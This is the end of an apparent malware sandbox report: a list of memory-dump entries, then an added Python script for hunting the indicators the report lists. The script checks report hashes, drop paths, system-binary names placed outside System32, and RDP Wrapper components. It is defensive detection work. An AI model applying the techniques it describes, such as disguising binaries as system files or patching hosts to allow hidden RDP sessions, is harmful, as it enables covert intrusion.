  • memory/5972-542-0x0000000000000000-mapping.dmp
  • memory/5976-532-0x0000000000000000-mapping.dmp
  • memory/5988-339-0x0000000000000000-mapping.dmp
  • memory/5992-594-0x0000000000000000-mapping.dmp
  • memory/5996-383-0x0000000000000000-mapping.dmp
  • memory/6000-514-0x0000000000000000-mapping.dmp
  • memory/6004-300-0x0000000000000000-mapping.dmp
  • memory/6012-470-0x0000000000000000-mapping.dmp
  • memory/6016-301-0x0000000000000000-mapping.dmp
  • memory/6020-389-0x0000000000000000-mapping.dmp
  • memory/6024-491-0x0000000000000000-mapping.dmp
  • memory/6028-564-0x0000000000000000-mapping.dmp
  • memory/6032-464-0x0000000000000000-mapping.dmp
  • memory/6044-526-0x0000000000000000-mapping.dmp
  • memory/6060-413-0x0000000000000000-mapping.dmp
  • memory/6064-489-0x0000000000000000-mapping.dmp
  • memory/6068-544-0x0000000000000000-mapping.dmp
  • memory/6072-556-0x0000000000000000-mapping.dmp
  • memory/6080-375-0x0000000000000000-mapping.dmp
  • memory/6096-343-0x0000000000000000-mapping.dmp
  • memory/6104-553-0x0000000000000000-mapping.dmp
  • memory/6108-394-0x0000000000000000-mapping.dmp
  • memory/6112-363-0x0000000000000000-mapping.dmp
  • memory/6120-302-0x0000000000000000-mapping.dmp
  • memory/6124-430-0x0000000000000000-mapping.dmp
  • memory/6128-303-0x0000000000000000-mapping.dmp
  • memory/6132-496-0x0000000000000000-mapping.dmp
  • memory/6136-345-0x0000000000000000-mapping.dmp
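The dropped-file list above is the part of this report a responder can act on directly. Three kinds of entries stand out: Windows system binary names written outside their only legitimate location (conhost.exe under SysWOW64\drivers, svchost.exe in the root of C:\Windows, lsass.exe, winlogon.exe and taskhostw.exe under ProgramData), the RDP Wrapper components (rdpwrap.dll, rdpwrap.ini, RDPWInst.exe) that patch the host to accept additional concurrent RDP sessions, and the three files for which the report gives full hashes. The script below is an added example, not part of the sandbox report or of any tool it names: the SHA256 values and paths are copied from the report, while the classification rules, the function names and the placeholder file contents are this example's own assumptions. It takes (path, bytes) pairs as produced by a disk triage export and returns the reasons each entry is suspicious.

```python
"""Hunt for the dropped-file indicators listed in this sandbox report.

Added example, not the report's own tooling. Hashes and paths are copied
from the report; rules, names and sample data are assumptions.
"""
import hashlib
from pathlib import PureWindowsPath

# SHA256 of the three dropped files the report hashes (copied from the report).
IOC_SHA256 = {
    "81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172",
    "222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f",
    "870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375",
}

# Drop locations copied from the report, lower-cased for comparison.
IOC_PATHS = {p.lower() for p in (
    r"C:\ProgramData\Windows\winit.exe",
    r"C:\ProgramData\install\sys.exe",
    r"C:\ProgramData\install\cheat.exe",
    r"C:\Programdata\RealtekHD\taskhostw.exe",
    r"C:\Programdata\WindowsTask\winlogon.exe",
    r"C:\Programdata\lsass.exe",
    r"C:\Windows\SysWOW64\drivers\conhost.exe",
    r"C:\Windows\svchost.exe",
    r"C:\rdp\RDPWInst.exe",
)}

# System binaries that legitimately live only directly under System32 or
# SysWOW64; the same file names anywhere else indicate masquerading.
SYSTEM_BINARIES = {"conhost.exe", "svchost.exe", "lsass.exe", "winlogon.exe", "taskhostw.exe"}
LEGIT_SYSTEM_DIRS = (r"\windows\system32", r"\windows\syswow64")

# RDP Wrapper components seen in the report (assumption: no administrator
# deliberately installed RDP Wrapper on the hosts being checked).
RDP_WRAPPER_NAMES = {"rdpwrap.dll", "rdpwrap.ini", "rdpwinst.exe"}


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def normalize(path: str) -> str:
    """Strip the NT object-manager prefix (\\??\\) the report uses and lower-case."""
    if path.startswith("\\??\\"):
        path = path[4:]
    return path.lower()


def classify_path(path: str) -> list[str]:
    """Return the reasons a path is suspicious; an empty list means no finding."""
    norm = normalize(path)
    p = PureWindowsPath(norm)
    reasons = []
    if norm in IOC_PATHS:
        reasons.append("path listed in report")
    if p.name in SYSTEM_BINARIES and not str(p.parent).endswith(LEGIT_SYSTEM_DIRS):
        reasons.append(f"system binary name {p.name} outside System32/SysWOW64")
    if p.name in RDP_WRAPPER_NAMES:
        reasons.append("RDP Wrapper component")
    return reasons


def scan(entries, ioc_sha256=IOC_SHA256):
    """entries: iterable of (windows_path, content_bytes_or_None).

    Returns {path: [reasons]} for every entry with at least one finding.
    Content is only hashed when it was collected (None = path-only evidence).
    """
    findings = {}
    for path, data in entries:
        reasons = classify_path(path)
        if data is not None and sha256_bytes(data) in ioc_sha256:
            reasons.append("SHA256 matches report")
        if reasons:
            findings[path] = reasons
    return findings


if __name__ == "__main__":
    # Constructed sample: paths from the report with placeholder contents.
    sample = [
        (r"\??\c:\windows\svchost.exe", b"constructed placeholder"),
        (r"C:\Windows\System32\conhost.exe", b"legitimate location, not flagged"),
        (r"C:\Windows\SysWOW64\drivers\conhost.exe", None),
        (r"\Program Files\RDP Wrapper\rdpwrap.dll", None),
        (r"\??\PIPE\RManFUSCallbackNotify32", None),
    ]
    for path, reasons in scan(sample).items():
        print(path, "->", "; ".join(reasons))
```

The name-based rule is deliberately stricter than the path list: a fresh build of the same toolkit can change drop directories and file hashes, but a binary calling itself lsass.exe or conhost.exe outside System32/SysWOW64 stays suspicious regardless. Hash matching is kept separate so the same function can be fed hashes from other reports of this family.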